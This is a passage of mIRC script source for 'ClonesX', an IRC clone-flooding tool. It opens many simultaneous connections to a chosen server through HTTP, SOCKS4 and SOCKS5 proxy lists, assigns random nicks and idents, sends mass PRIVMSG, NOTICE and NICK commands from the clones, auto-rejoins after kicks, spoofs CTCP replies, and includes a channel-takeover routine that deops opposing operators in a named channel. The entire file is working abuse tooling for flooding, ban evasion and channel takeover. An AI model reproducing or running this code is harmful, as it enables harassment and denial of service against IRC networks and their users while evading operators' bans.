If ($Did == 310) { P.Cloning.runcmd PRIVMSG $Did($DName,322).Text : $+ $Did($DName,324).Text }
If ($Did == 311) { P.Cloning.runcmd NOTICE $Did($DName,326).Text : $+ $Did($DName,328).Text }
If ($Did == 312) { P.Cloning.runcmd $Did($DName,329).Text }
If ($Did == 330) { P.Cloning.runcmd NICK $Did($DName,331).Text }
If ($Did == 20) { P.Cloning.list.nicksch $SFile($mircdir,"Select") }
If ($Did == 3000) {
Unset %P.Cloning.Nlist.conn*
Set %P.Cloning.Nlist.conn 1
Set %P.Cloning.Nlist.conn.f $SFile($mircdir,"Choose File")
If (%P.Cloning.Nlist.conn.f) { P.Cloning.ddnsd }
}
}
On *:Dialog:p.cloning:menu:*: {
If ($Did == 476) { Set %p.save.cloning.srv $Did($DName,10).Text }
If ($Did == 412) { P.Cloning.ipports }
If ($Did == 415) { P.Cloning.list.nicksch $mircdirClXNickList.cfg }
If ($Did == 416) { P.Cloning.list.nicksch $SFile($mircdir,"Select") }
If ($Did == 418) { P.Cloning.list.save $mircdirClXNickList.cfg }
If ($Did == 419) { P.Cloning.list.save $SFile($mircdir,"Seclect",Select) }
If ($Did == 421) {
Unset %P.Cloning.Nlist.conn*
Set %P.Cloning.Nlist.conn 1
If ($exists($mircdirClXNickList.cfg) == $False) { P.Cloning.fal File not Found }
Set %P.Cloning.Nlist.conn.f $mircdirClXNickList.cfg
P.Cloning.ddnsd
}
If ($Did == 422) {
Unset %P.Cloning.Nlist.conn*
Set %P.Cloning.Nlist.conn 1
Set %P.Cloning.Nlist.conn.f $SFile($mircdir,"Choose File")
If (%P.Cloning.Nlist.conn.f) { P.Cloning.ddnsd }
}
}
Alias -l P.Cloning.nick.gr.ad {
If ($Dialog(p.cloning)) {
Var %I = 1
While ($Did(p.cloning,339,$Did(p.cloning,339,%I).sel).Text) {
Var %P.Cloning.adgr1.nicks = $IfMatch
If (!$Didwm(p.cloning,$1,%P.Cloning.adgr1.nicks)) { Did -i p.cloning $1 $calc($Did(p.cloning,$1).lines + 1) %P.Cloning.adgr1.nicks }
Inc %I
}
}
}
Alias -l P.Cloning.jj {
If ($Did(p.cloning,47).Text == Normal) { p.clon.do }
Elseif ($Did(p.cloning,47).Text == Proxy) {
If (!$Did(p.cloning,4,1)) { P.Cloning.fal Please add Proxies to the Proxy list. | P.Cloning.recr 1 | Return }
p.clon.do
}
Elseif ($Did(p.cloning,47).Text == Socks 4) {
If (!$Did(p.cloning,69,1)) { P.Cloning.fal Please add Proxies to the Socks 4 list. | P.Cloning.recr 1 | Return }
p.clon.do
}
Elseif ($Did(p.cloning,47).Text == Socks 5) {
If (!$Did(p.cloning,78,1)) { P.Cloning.fal Please add Proxies to the Socks 5 list. | P.Cloning.recr 1 | Return }
p.clon.do
}
}
Alias -l p.clon.dodo {
If ($Dialog(p.cloning)) && (!$Sock($1)) {
P.Cloning.do.w $1 0,0
.sockopen $1-
If ($Did(p.cloning,47).Text == Normal) { Var %p.clon.dodo = *Socket -Normal-: }
If ($Did(p.cloning,47).Text == Proxy) { Var %p.clon.dodo = *Socket -Proxy-: }
If ($Did(p.cloning,47).Text == Socks 4) { Var %p.clon.dodo = *Socket -Socks 4-: }
If ($Did(p.cloning,47).Text == Socks 5) { Var %p.clon.dodo = *Socket -Socks 5-: }
p.clon.stats %p.clon.dodo $Did(p.cloning,10) $Did(p.cloning,12)
}
}
Alias -l p.clon.do {
If ($Dialog(p.cloning)) {
P.Cloning.recr 0
Var %P.Cloning.delay = $Did(p.cloning,391).Text
If ($Did(p.cloning,47).Text == Normal) {
Var %I = 1
While (%I <= $Did(p.cloning,50).Text) {
Inc %P.Cloning.t
.timerP.Cloning. [ $+ [ %P.Cloning.t ] ] 1 $calc($iif(%I == 1,0,%I) * %P.Cloning.delay) p.clon.dodo P.Cloning. [ $+ [ %P.Cloning.t ] ] $Did(p.cloning,10) $Did(p.cloning,12)
Inc %I
}
.timerP.Cloning.Recr. [ $+ [ $rand(1,9999) ] ] 1 $calc(%I * %P.Cloning.delay) P.Cloning.recr 1
P.Cloning.recr 0
}
Elseif ($Did(p.cloning,47).Text == Proxy) {
Var %I = 1
While (%I <= $Did(p.cloning,50).Text) {
If ($Did(p.cloning,4,$calc(%P.Cloning.pn + 1))) { Inc %P.Cloning.pn }
Elseif ($Did(p.cloning,4,1)) { Set %P.Cloning.pn 1 }
Else { P.Cloning.fal Not Proxies. Configure. | Return }
Inc %P.Cloning.t
.timerP.Cloning. [ $+ [ %P.Cloning.t ] ] 1 $calc($iif(%I == 1,0,%I) * %P.Cloning.delay) p.clon.dodo P.Cloning. [ $+ [ %P.Cloning.t ] ] $Gettok($Did(p.cloning,4,%P.Cloning.pn),1,32) $Gettok($Did(p.cloning,4,%P.Cloning.pn),2,32)
Inc %I
}
.timerP.Cloning.Recr. [ $+ [ $rand(1,9999) ] ] 1 $calc(%I * %P.Cloning.delay) P.Cloning.recr 1
P.Cloning.recr 0
}
Elseif ($Did(p.cloning,47).Text == Socks 4) {
Var %I = 1
While (%I <= $Did(p.cloning,50).Text) {
If ($Did(p.cloning,69,$calc(%P.Cloning.pn4 + 1))) { Inc %P.Cloning.pn4 }
Elseif ($Did(p.cloning,69,1)) { Set %P.Cloning.pn4 1 }
Else { P.Cloning.fal Not Socks 4. Configure. | Return }
Inc %P.Cloning.t
.timerP.Cloning. [ $+ [ %P.Cloning.t ] ] 1 $calc($iif(%I == 1,0,%I) * %P.Cloning.delay) p.clon.dodo P.Cloning. [ $+ [ %P.Cloning.t ] ] $Gettok($Did(p.cloning,69,%P.Cloning.pn4),1,32) $Gettok($Did(p.cloning,69,%P.Cloning.pn4),2,32)
Inc %I
}
.timerP.Cloning.Recr. [ $+ [ $rand(1,9999) ] ] 1 $calc(%I * %P.Cloning.delay) P.Cloning.recr 1
P.Cloning.recr 0
}
Elseif ($Did(p.cloning,47).Text == Socks 5) {
Var %I = 1
While (%I <= $Did(p.cloning,50).Text) {
If ($Did(p.cloning,78,$calc(%P.Cloning.pn5 + 1))) { Inc %P.Cloning.pn5 }
Elseif ($Did(p.cloning,78,1)) { Set %P.Cloning.pn5 1 }
Else { P.Cloning.fal Not Socks 5. Configure. | Return }
Inc %P.Cloning.t
.timerP.Cloning. [ $+ [ %P.Cloning.t ] ] 1 $calc($iif(%I == 1,0,%I) * %P.Cloning.delay) p.clon.dodo P.Cloning. [ $+ [ %P.Cloning.t ] ] $Gettok($Did(p.cloning,78,%P.Cloning.pn5),1,32) $Gettok($Did(p.cloning,78,%P.Cloning.pn5),2,32)
Inc %I
}
.timerP.Cloning.Recr. [ $+ [ $rand(1,9999) ] ] 1 $calc(%I * %P.Cloning.delay) P.Cloning.recr 1
P.Cloning.recr 0
}
}
}
Alias -l P.Cloning.recr {
If ($Dialog(p.cloning)) {
If ($1 == 0) {
Did -b p.cloning 10 | Did -b p.cloning 12 | Did -b p.cloning 47 | Did -b p.cloning 50 | Did -b p.cloning 391 | Did -b p.cloning 422
Did -b p.cloning 35 | Did -b p.cloning 36 | Did -b p.cloning 37 | Did -b p.cloning 38 | Did -b p.cloning 421 | Did -b p.cloning 48
}
If ($1 == 1) {
Did -e p.cloning 10 | Did -e p.cloning 12 | Did -e p.cloning 47 | Did -e p.cloning 50 | Did -e p.cloning 391
Did -e p.cloning 35 | Did -e p.cloning 36 | Did -e p.cloning 37 | Did -e p.cloning 38
If (??* iswm $Did(p.cloning,10)) && ($abs($Did(p.cloning,12)) != 0) && ($abs($Did(p.cloning,50)) != 0) {
If ($Did(p.cloning,36).state == 0) { Did -e p.cloning 48 | Did -e p.cloning 421 | Did -e p.cloning 422 }
Elseif ($Did(p.cloning,38)) { Did -e p.cloning 48 | Did -e p.cloning 421 | Did -e p.cloning 422 }
}
}
}
}
Alias -l p.clon.stats {
If ($Dialog(p.cloning)) {
Did -o p.cloning 41 1 $iif($P.Cloning.dos.numCL(1),$P.Cloning.dos.numCL(1),-)
Did -o p.cloning 43 1 $iif($P.Cloning.dos.numCL(0),$P.Cloning.dos.numCL(0),-)
If ($1-) { Did -i p.cloning 44 $Did(p.cloning,44).lines $1- }
}
}
On *:Dialog:p.cloning:init:0: {
.disable #P.Cloning.DdnsD
If ($hget(P.Cloning.a)) { hfree P.Cloning.a }
Unset %P.Cloning.pn %P.Cloning.t | .timerP.Cloning.* off
Did -i $DName 12 1 6666 | Did -i $DName 12 2 6667 | Did -i $DName 12 3 6668 | Did -i $DName 12 4 6669 | Did -i $DName 12 5 7000 | Did -i $DName 12 6 8888 | Did -c $DName 12 2
If (%p.save.cloning.srv) { Did -i $DName 10 1 %p.save.cloning.srv }
Did -c $DName 35 | Did -i $DName 37 1 Random | Did -i $DName 37 2 Fucker | Did -i $DName 37 3 Sucker | Did -i $DName 37 4 Flooder | Did -c $DName 37 1
Did -c $DName 333 | Did -b $DName 415 | Did -b $DName 416 | Did -b $DName 418 | Did -b $DName 419 | Did -b $DName 412
Var %I = 1 | Var %o = 1 | While (%o < 600) { Did -i $DName 50 %I %o | Inc %I | Var %o = %o * 2 } | Did -c $DName 50 8
Var %I = 1 | Var %o = 1 | While (%o < 5) { Did -i $DName 391 %I %o | Inc %I | Var %o = %o * 2 } | Did -i $DName 391 1 0 | Did -c $DName 391 1
Did -i $DName 47 1 Normal | Did -i $DName 47 2 Proxy | Did -i $DName 47 3 Socks 4 | Did -i $DName 47 4 Socks 5 | Did -c $DName 47 1
P.Cloning.conEcheck
}
On *:SockRead:P.Cloning.*: {
If ($Dialog(p.cloning)) {
Var %P.Cloning.server = $Did(p.cloning,10)
Var %P.Cloning.port = $Did(p.cloning,12)
If ($sockerr != 0) { P.Cloning.con.com $SockName | p.clon.stats Disconnected: %P.Cloning.server %P.Cloning.port - $+ %P.Cloning.read $+ - | P.Cloning.cmds }
Else {
If ($Did(p.cloning,47).Text == Socks 4) {
If ($Sock($SockName).mark != 1) {
SockRead &P.Cloning.bread
If ($bvar(&P.Cloning.bread,1,2) == 0 90) { P.Cloning.usIn $SockName | sockmark $SockName 1 }
If ($bvar(&P.Cloning.bread,1,2) == 0 91) { P.Cloning.con.com $SockName | p.clon.stats Disconnected: %P.Cloning.server %P.Cloning.port -Socks4- | .sockclose $SockName | P.Cloning.cmds | Return }
}
}
If ($Did(p.cloning,47).Text == Socks 5) {
If ($Sock($SockName).mark != 1) {
SockRead &P.Cloning.bread
If ($bvar(&P.Cloning.bread,1,2) == 5 0) && ($bvar(&P.Cloning.bread,3) != 0) {
Var %P.Cloning.portS5 = $Gettok($longip(%P.Cloning.port),3,46) $Gettok($longip(%P.Cloning.port),4,46)
Var %P.Cloning.serverS5 = $replace(%P.Cloning.server,.,$chr(32))
bset &P.Cloning.ssenndd 1 5 1 0 1 %P.Cloning.serverS5 %P.Cloning.portS5
SockWrite $SockName &P.Cloning.ssenndd
}
If ($bvar(&P.Cloning.bread,1,2) == 5 255) { P.Cloning.con.com $SockName | p.clon.stats Disconnected: %P.Cloning.server %P.Cloning.port -Socks5- | P.Cloning.cmds }
If ($bvar(&P.Cloning.bread,1,3) == 5 0 0) { P.Cloning.usIn $SockName | sockmark $SockName 1 }
If ($bvar(&P.Cloning.bread,1,3) == 5 4 0) { P.Cloning.con.com $SockName | p.clon.stats Disconnected: %P.Cloning.server %P.Cloning.port -Socks5- | P.Cloning.cmds }
If ($bvar(&P.Cloning.bread,1,3) == 5 5 0) { P.Cloning.con.com $SockName | p.clon.stats Disconnected: %P.Cloning.server %P.Cloning.port -Socks5- | P.Cloning.cmds }
If ($bvar(&P.Cloning.bread,1,3) == 5 9 0) { P.Cloning.con.com $SockName | p.clon.stats Disconnected: %P.Cloning.server %P.Cloning.port -Socks5- | P.Cloning.cmds }
}
}
SockRead %P.Cloning.read
tokenize 32 %P.Cloning.read
If ($abs($2)) && ($Left($1,1) == $chr(58)) {
If ($2 == 1) {
P.Cloning.do.w $SockName 1, $+ $3
p.clon.stats -Connected: %P.Cloning.server %P.Cloning.port
P.Cloning.cmds
SockWrite -nt $SockName Mode $P.Cloning.do.saNick($SockName) $Did(p.cloning,58).Text
;SockWrite -nt $SockName Join #test
;SockWrite -nt $SockName Oper SnuG something
;SockWrite -nt $SockName SetHost $Read(Host.txt)
}
If ($2 == 433) && ($Gettok($hget(P.Cloning.a,$SockName),1,44) == 0) { P.Cloning.usIn $SockName }
}
Elseif (!$abs($2)) {
If ($2 == NICK) {
If ($remove($Gettok($1,1,33),:) == $P.Cloning.do.saNick($SockName)) && ($Gettok($1,2,33)) {
Var %P.Cloning.nnick = $remove($3,:)
Var %P.Cloning.anick = $remove($Gettok($1,1,33),:)
If ($Didwm(p.cloning,351,%P.Cloning.anick)) { Did -o p.cloning 351 $IfMatch %P.Cloning.nnick }
If ($Didwm(p.cloning,369,%P.Cloning.anick)) { Did -o p.cloning 369 $IfMatch %P.Cloning.nnick }
If ($Didwm(p.cloning,373,%P.Cloning.anick)) { Did -o p.cloning 373 $IfMatch %P.Cloning.nnick }
P.Cloning.do.w $SockName 1, $+ %P.Cloning.nnick
P.Cloning.nicks.act
}
}
}
If ($1 == PING) { SockWrite -nt $SockName pong : $+ $remove($2,:) | Return }
If ($Did(p.cloning,46).State == 1) {
If ($4 == : VERSION ) && ($2 == PRIVMSG) { SockWrite -nt $SockName NOTICE $remove($Gettok($1,1,33),:) : VERSION $VReply($Rand(1,15)) $+ }
If ($4 == : TIME ) && ($2 == PRIVMSG) { SockWrite -nt $SockName NOTICE $remove($Gettok($1,1,33),:) : TIME $AscTime($Rand($CTime,$Calc($CTime + $Rand(1,200000)))) $+ }
If ($4 == : PING) && ($2 == PRIVMSG) { SockWrite -nt $SockName NOTICE $remove($Gettok($1,1,33),:) : PING $CTime $+ }
}
If ($2 == KICK) { SockWrite -nt $SockName JOIN $3 }
If ($2 == MODE) && (-ooo* iswm $4) && ($3 == #Maldivians) { SockWrite -nt $SockName Mode $3 -o $remove($Gettok($1,1,33),:) | .timero $+ $rand(1,99999) 1 $rand(1,25) SockWrite -nt $SockName Mode $3 +oooooo $5- }
;If ($2 == MODE) && (-o* iswm $4) && ($3 == #Maldivians) { SockWrite -nt $SockName Mode $3 +o $5- }
;If ($2 == MODE) && (+o* iswm $4) && ($3 == #Maldivians) { SockWrite -nt $SockName Mode $3 -o $5- }
}
}
}
alias P.Cloning.do.saSockN {
Var %I = 1
While ($P.Cloning.r(%I)) {
If ($Gettok($P.Cloning.r(%I),2,44) == $1) { Return $hget(P.Cloning.a,%I).item }
Inc %I
}
}

Alias -l P.Cloning.con.com { If ($hget(P.Cloning.a)) { hdel P.Cloning.a $1 } }

On *:SOCKOPEN:P.Cloning.*: {
If ($Dialog(p.cloning)) {
Var %P.Cloning.server = $Did(p.cloning,10)
Var %P.Cloning.port = $Did(p.cloning,12)
If ($sockerr != 0) { P.Cloning.con.com $SockName | p.clon.stats Disconnected: %P.Cloning.server %P.Cloning.port -Session Start- | P.Cloning.cmds }
Else {
If ($Did(p.cloning,47).Text == Normal) { P.Cloning.usIn $SockName }
Elseif ($Did(p.cloning,47).Text == Proxy) {
SockWrite $SockName CONNECT %P.Cloning.server $+ : $+ %P.Cloning.port HTTP/1.0 $+ $CRLF $+ $CRLF
SockWrite $SockName $CRLF
.timerUs. [ $+ [ $SockName ] ] 1 2 P.Cloning.usIn $SockName
}
Elseif ($Did(p.cloning,47).Text == Socks 4) {
Var %P.Cloning.port1 = $Gettok($longip(%P.Cloning.port),3,46)
Var %P.Cloning.port2 = $Gettok($longip(%P.Cloning.port),4,46)
Var %P.Cloning.portS4 = $Gettok($longip(%P.Cloning.port),3,46) $Gettok($longip(%P.Cloning.port),4,46)
Var %P.Cloning.serverS4 = $replace(%P.Cloning.server,.,$chr(32))
bset &P.Cloning.ssenndd 1 4 1 %P.Cloning.portS4 %P.Cloning.serverS4 $CRLF
SockWrite $SockName &P.Cloning.ssenndd
}
Elseif ($Did(p.cloning,47).Text == Socks 5) {
bset &P.Cloning.ssenndd 1 5 1 0
SockWrite $SockName &P.Cloning.ssenndd
}

}

}
}

Alias -l P.Cloning.cmds {
If ($Dialog(p.cloning)) {
P.Cloning.nicks.act
If ($Did(p.cloning,314).enabled == $False) && ($Did(p.cloning,41).Text > 0) {
Did -e p.cloning 314 | Did -e p.cloning 316 | Did -e p.cloning 320 | Did -e p.cloning 18 | Did -e p.cloning 31 | Did -e p.cloning 17
Did -e p.cloning 322 | Did -e p.cloning 324 | Did -e p.cloning 326 | Did -e p.cloning 328 | Did -e p.cloning 29
Did -e p.cloning 329 | Did -e p.cloning 331 | Did -e p.cloning 333 | Did -e p.cloning 339 | Did -e p.cloning 31
Did -e p.cloning 334 | Did -e p.cloning 335 | Did -e p.cloning 336 | Did -e p.cloning 337 | Did -e p.cloning 27
Did -e p.cloning 372 | Did -e p.cloning 373 | Did -e p.cloning 369 | Did -e p.cloning 368 | Did -e p.cloning 25
Did -e p.cloning 367 | Did -e p.cloning 351 | Did -e p.cloning 350 | Did -e p.cloning 349 | Did -e p.cloning 23
Did -e p.cloning 415 | Did -e p.cloning 416 | Did -e p.cloning 418 | Did -e p.cloning 419 | Did -e p.cloning 20
Did -e p.cloning 371 | Did -e p.cloning 412 | Did -e p.cloning 783 | Did -e p.cloning 11 | Did -e p.cloning 13 | Did -e p.cloning 16
}
Elseif ($Did(p.cloning,314).enabled == $True) && ($Did(p.cloning,41).Text <= 0) || ($Did(p.cloning,41).Text == $null) {
Did -r p.cloning 314 | Did -r p.cloning 316 | Did -r p.cloning 320 | Did -r p.cloning 783 | Did -r p.cloning 23
Did -r p.cloning 322 | Did -r p.cloning 324 | Did -r p.cloning 326 | Did -r p.cloning 328 | Did -r p.cloning 13
Did -r p.cloning 329 | Did -r p.cloning 331 | Did -r p.cloning 339 | Did -r p.cloning 351 | Did -r p.cloning 16
Did -r p.cloning 369 | Did -r p.cloning 373 | Did -b p.cloning 306 | Did -b p.cloning 307 | Did -r p.cloning 17
Did -b p.cloning 309 | Did -b p.cloning 310 | Did -b p.cloning 311 | Did -b p.cloning 20 | Did -r p.cloning 31
Did -b p.cloning 314 | Did -b p.cloning 316 | Did -b p.cloning 320 | Did -b p.cloning 23 | Did -r p.cloning 29 | Did -b p.cloning 17
Did -b p.cloning 322 | Did -b p.cloning 324 | Did -b p.cloning 326 | Did -b p.cloning 328 | Did -r p.cloning 18
Did -b p.cloning 329 | Did -b p.cloning 331 | Did -b p.cloning 333 | Did -b p.cloning 339 | Did -b p.cloning 24
Did -b p.cloning 334 | Did -b p.cloning 335 | Did -b p.cloning 336 | Did -b p.cloning 337 | Did -b p.cloning 25
Did -b p.cloning 372 | Did -b p.cloning 373 | Did -b p.cloning 369 | Did -b p.cloning 368 | Did -b p.cloning 27
Did -b p.cloning 367 | Did -b p.cloning 351 | Did -b p.cloning 350 | Did -b p.cloning 349 | Did -b p.cloning 28
Did -b p.cloning 415 | Did -b p.cloning 416 | Did -b p.cloning 418 | Did -b p.cloning 419 | Did -b p.cloning 29
Did -b p.cloning 312 | Did -b p.cloning 330 | Did -b p.cloning 371 | Did -b p.cloning 412 | Did -b p.cloning 31
Did -b p.cloning 783 | Did -b p.cloning 11 | Did -b p.cloning 13 | Did -b p.cloning 18 | Did -b p.cloning 15 | Did -b p.cloning 16
}
}
}

Alias -l P.Cloning.do.saNick { Return $Gettok($hget(P.Cloning.a,$1),2,44) }
Alias -l P.Cloning.do.saSockN {
Var %I = 1
While ($P.Cloning.r(%I)) {
If ($Gettok($P.Cloning.r(%I),2,44) == $1) { Return $hget(P.Cloning.a,%I).item }
Inc %I
}
}

Alias -l P.Cloning.runcmd {
If ($Dialog(p.cloning)) {
If ($Did(p.cloning,334).state == 1) {
Var %I = 1
While ($Did(p.cloning,339,$Did(p.cloning,339,%I).sel).Text) {
Var %P.Cloning.runcmd.nick = $IfMatch
If ($1 == nick) {
If (!$Did(p.cloning,339,2).sel) { SockWrite -nt $P.Cloning.do.saSockN(%P.Cloning.runcmd.nick) $1 $iif($2 == Random,$RandNick($Rand(4,10)),$2) }
Else { SockWrite -nt $P.Cloning.do.saSockN(%P.Cloning.runcmd.nick) $1 $iif($2 == Random,$RandNick($Rand(4,10)),$2) $+ $rand(a,z) $+ $rand(a,z) }
}
Else { SockWrite -nt $P.Cloning.do.saSockN(%P.Cloning.runcmd.nick) $1- }
Inc %I
}
return
}
Elseif ($Did(p.cloning,333).state == 1) { Var %P.Cloning.runcmd.idL = 339 }
Elseif ($Did(p.cloning,335).state == 1) { Var %P.Cloning.runcmd.idL = 351 }
Elseif ($Did(p.cloning,336).state == 1) { Var %P.Cloning.runcmd.idL = 369 }
Elseif ($Did(p.cloning,337).state == 1) { Var %P.Cloning.runcmd.idL = 373 }
}
Var %I = 1
While ($Did(p.cloning,%P.Cloning.runcmd.idL,%I).Text) {
Var %P.Cloning.runcmd.nick = $IfMatch
If ($1 == nick) {
If (!$Did(p.cloning,%P.Cloning.runcmd.idL,2)) { SockWrite -nt $P.Cloning.do.saSockN(%P.Cloning.runcmd.nick) $1 $iif($2 == Random,$RandNick($Rand(4,10)),$2) }
Else { SockWrite -nt $P.Cloning.do.saSockN(%P.Cloning.runcmd.nick) $1 $iif($2 == Random,$RandNick($Rand(4,10)),$2) $+ $rand(a,z) $+ $rand(a,z) }
}
Else { SockWrite -nt $P.Cloning.do.saSockN(%P.Cloning.runcmd.nick) $1- }
Inc %I
}
}
Alias -l P.Cloning.list.nicksch {
If ($Dialog(p.cloning)) {
Var %I = 1
Var %o = 1
While ($P.Cloning.r(%I)) {
Var %P.Cloning.list.nicksch.sta = $Gettok($IfMatch,1,44)
Var %P.Cloning.list.nicksch.nick = $Gettok($IfMatch,2,44)
If (%P.Cloning.list.nicksch.sta) {
If ($exists($1) == $False) { P.Cloning.fal Archivo no encontrado! }
Var %P.Cloning.list.nicksch.nnick = $Gettok($read($1,%o),1,32)
If (%P.Cloning.list.nicksch.nnick) {
If ($abs(%P.Cloning.list.nicksch.nnick)) { P.Cloning.fal Nicklist Cannot be in that Format. File format: Nick [Ident] }
SockWrite -nt $hget(P.Cloning.a,%I).item nick %P.Cloning.list.nicksch.nnick
}
Inc %O
}
Inc %I
}
}
}
Alias -l P.Cloning.list.save {
If ($Dialog(p.cloning)) {
Var %I = 1
.remove $1
While ($Did(p.cloning,339,%I).Text) { write $1 $IfMatch | Inc %I }
}
}
Alias -l P.Cloning.nicks.act {
If ($Dialog(p.cloning)) {
Did -r p.cloning 339
Var %I = 1
Var %o = 1
While ($P.Cloning.r(%I)) {
Var %P.Cloning.nicks.act = $Gettok($IfMatch,1,44)
Var %P.Cloning.nicks = $Gettok($IfMatch,2,44)
If (%P.Cloning.nicks.act == 1) { Did -i p.cloning 339 %o %P.Cloning.nicks | Var %o = %o + 1 }
Inc %I
}
}
}
Alias -l P.Cloning.usIn {
If ($Dialog(p.cloning)) {
If (%P.Cloning.Nlist.conn == 1) {
Inc %P.Cloning.Nlist.conn.n
Var %P.Cloning.usIn.nick = $Gettok($read(%P.Cloning.Nlist.conn.f,%P.Cloning.Nlist.conn.n),1,32)
Var %P.Cloning.usIn.ident = $lower($Gettok($read(%P.Cloning.Nlist.conn.f,%P.Cloning.Nlist.conn.n),2,32))
If (%P.Cloning.usIn.nick) && ($abs(%P.Cloning.usIn.nick)) { P.Cloning.fal Nicklist Cannot be in that Format. File format: Nick [Ident] }
If ($Sock($1)) { SockWrite -nt $1 user $lower($iif(%P.Cloning.usIn.ident,%P.Cloning.usIn.ident,$iif($Did(p.cloning,37).Text == Random,$RandNick($Rand(4,10)),$Did(p.cloning,37).Text))) "" "" : $+ $RandNick($Rand(4,10)) $+ $RandNick($Rand(4,10)) }
Else { .sockclose $1 | P.Cloning.con.com $1 | p.clon.stats Disconnected: $Did(p.cloning,10) $Did(p.cloning,12) -Blocked- | P.Cloning.cmds }
Var %P.Cloning.usIn.nick = $lower($iif(%P.Cloning.usIn.nick,%P.Cloning.usIn.nick,$iif($Did(p.cloning,37).Text == Random,$RandNick($Rand(4,10)),$Did(p.cloning,37).Text $+ $rand(0,9999)))))
P.Cloning.do.w $1 0, $+ %P.Cloning.usIn.nick
If ($Sock($1)) { SockWrite -nt $1 nick %P.Cloning.usIn.nick }
Else { .sockclose $1 | P.Cloning.con.com $1 | p.clon.stats Disconnected: $Did(p.cloning,10) $Did(p.cloning,12) -Blocked- | P.Cloning.cmds }
}
Else {
If ($Did(p.cloning,35).state == 1) {
If ($Sock($1)) { SockWrite -nt $1 user $lower($iif($Did(p.cloning,37).Text == Random,$RandNick($Rand(4,10)),$Did(p.cloning,37).Text)) "" "" : $+ $RandNick($Rand(4,10)) $+ $RandNick($Rand(4,10)) }
Else { .sockclose $1 | P.Cloning.con.com $1 | p.clon.stats Disconnected: $Did(p.cloning,10) $Did(p.cloning,12) -Blocked- | P.Cloning.cmds }
Var %P.Cloning.usIn.nick = $lower($iif($Did(p.cloning,37).Text == Random,$RandNick($Rand(4,10)),$Did(p.cloning,37).Text)) $+ $+ $rand(a,z) $+ $rand(a,z)
P.Cloning.do.w $1 0, $+ %P.Cloning.usIn.nick
If ($Sock($1)) { SockWrite -nt $1 nick %P.Cloning.usIn.nick }
Else { .sockclose $1 | P.Cloning.con.com $1 | p.clon.stats Disconnected: $Did(p.cloning,10) $Did(p.cloning,12) -Blocked- | P.Cloning.cmds }
}
Elseif ($Did(p.cloning,36).state == 1) {
If ($Sock($1)) { SockWrite -nt $1 user $lower($iif($Did(p.cloning,38).Text == Random,$RandNick($Rand(4,10)),$Did(p.cloning,38).Text)) "" "" : $+ $RandNick($Rand(4,10)) $+ $RandNick($Rand(4,10)) }
Else { .sockclose $1 | P.Cloning.con.com $1 | p.clon.stats Disconnected: $Did(p.cloning,10) $Did(p.cloning,12) -Blocked- | P.Cloning.cmds }
Var %P.Cloning.usIn.nick = $lower($iif($Did(p.cloning,38).Text == Random,$RandNick($Rand(4,10)),$Did(p.cloning,38).Text)) $+ $+ $rand(a,z) $+ $rand(a,z)
P.Cloning.do.w $1 0, $+ %P.Cloning.usIn.nick
If ($Sock($1)) { SockWrite -nt $1 nick %P.Cloning.usIn.nick }
Else { .sockclose $1 | P.Cloning.con.com $1 | p.clon.stats Disconnected: $Did(p.cloning,10) $Did(p.cloning,12) -Blocked- | P.Cloning.cmds }
}
}
}
}
On *:SOCKCLOSE:P.Cloning.*: {
If ($Dialog(p.cloning)) {
;echo -s Ha cerrado: $Sock($SockName,1).wsmsg
P.Cloning.con.com $SockName | p.clon.stats Disconnected: $Did(p.cloning,10) $Did(p.cloning,12) -Access has Distance- | P.Cloning.cmds
}
}
Alias -l P.Cloning.w { hadd -m P.Cloning.a $1 $2 }
Alias -l P.Cloning.r { Return $hget(P.Cloning.a,$hget(P.Cloning.a,$1).item) }
Alias -l P.Cloning.do.w { P.Cloning.w $1 $2 }
Alias -l P.Cloning.dos.numCL {
Var %I = 1 | Var %o = 0
While ($P.Cloning.r(%I)) {
Var %P.Cloning.pill = $IfMatch
If ($Gettok(%P.Cloning.pill,1,44) == 1) { Var %o = %o + 1 }
Inc %I
}
If ($1 == 0) { Return $calc(%I - 1) }
Elseif ($1 == 1) { Return %o }

}
Alias -l P.Cloning.ipports {
If ($Dialog(P.Cloning.ipport)) { Dialog -v P.Cloning.ipport }
Else { Dialog -md P.Cloning.ipport P.Cloning.ipport }
}
Dialog P.Cloning.ipport {
Title "ClonesX Connected IPs and Ports"
Size -1 -1 312 456
Option Pixels
Edit "", 3, 8 8 298 410, read multi hsbar vsbar
Button "&Refresh List", 4, 6 422 298 28
}
Alias -l P.Cloning.ipports.act {
If ($Dialog(P.Cloning.ipport)) {
Did -r P.Cloning.ipport 3
Var %I = 1
While ($Sock(P.Cloning.*,%I)) {
Var %P.Cloning.ipports.act = $IfMatch
Var %P.Cloning.ipports.act.ip = $Sock(%P.Cloning.ipports.act).ip
Var %P.Cloning.ipports.act.port = $Sock(%P.Cloning.ipports.act).port
If ($Gettok($hget(P.Cloning.a,%P.Cloning.ipports.act),1,44) == 1) && (!$Didwm(P.Cloning.ipport,3,%P.Cloning.ipports.act.ip %P.Cloning.ipports.act.port)) {
Did -i P.Cloning.ipport 3 $Did(P.Cloning.ipport,3).lines %P.Cloning.ipports.act.ip %P.Cloning.ipports.act.port
}
Inc %I
}
}
}
On *:Dialog:P.Cloning.ipport:sclick:4: { P.Cloning.ipports.act }
On *:Dialog:P.Cloning.ipport:init:0: { P.Cloning.ipports.act }
On *:Dialog:P.Cloning.errD:init:0: { Did -a $DName 1 %P.Cloning.errD }
on *:START: { Unset %P.Cloning.* | Set %p.cloining.wh $script }
on *:LOAD: { Unset %p.cloning* | Unset %p.save.cloning* | Unset %p.act.cloning* }
Alias -l P.Cloning.fal { Var %A $Input($1-,o,ClonesX) | Halt }
Alias RandNick {
If ($1 == 3) { Return $R(a,z) $+ $R(a,z) $+ $R(a,z) }
If ($1 == 4) { Return $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) }
If ($1 == 5) { Return $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) }
If ($1 == 6) { Return $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) }
If ($1 == 7) { Return $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) }
If ($1 == 8) { Return $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) }
If ($1 == 9) { Return $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) $+ $R(a,z) }
